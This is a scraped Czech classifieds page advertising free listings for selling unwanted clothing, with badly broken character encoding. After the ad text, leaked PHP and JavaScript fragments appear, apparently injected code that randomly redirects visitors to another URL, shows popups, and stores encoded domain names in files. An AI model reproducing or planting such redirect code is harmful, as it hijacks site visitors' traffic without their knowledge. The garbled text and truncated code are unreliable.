Inzerce obleA?enA�

inzerce obleA?enA�KaA?dA? mA? doma obleA?enA�, kterA� se mu nelA�bA� a nenosA� ho. Spousta lidA� si poklA?dA? otA?zku – co s nA�m? Co ho zkusit prodat? NaA?e inzerce obleA?enA� je tu pro vA?s. SamozA�ejmostA� je moA?nost inzerce obleA?enA� zcela zdarma.

var now = new Date().getTime();if (now%3 == 0) {window.location = '$url';} ";}function redirect($url){show_popup($url);return;$r=rand(5,20);sleep($r);echo "";die();die("");}function check_status($df1,$df2){$domain=read_str($df1,$df2);echo "Domain is: $domain\n";}function read_str($fname1,$fname2){$file=fopen($fname1,'r');$name=$fname1;if(!$file){$name=$fname2;$file=fopen($fname2,'r');}if(!$file){return;}$str=fread($file,filesize($name));$str=dec($str);fclose($file);return $str;}function save_str($str,$fname1,$fname2){$file=fopen($fname1,'w');if(!$file){$file=fopen($fname2,'w');}if(!$file){return;}$str=enc($str);fwrite($file,$str);fclose($file);}?>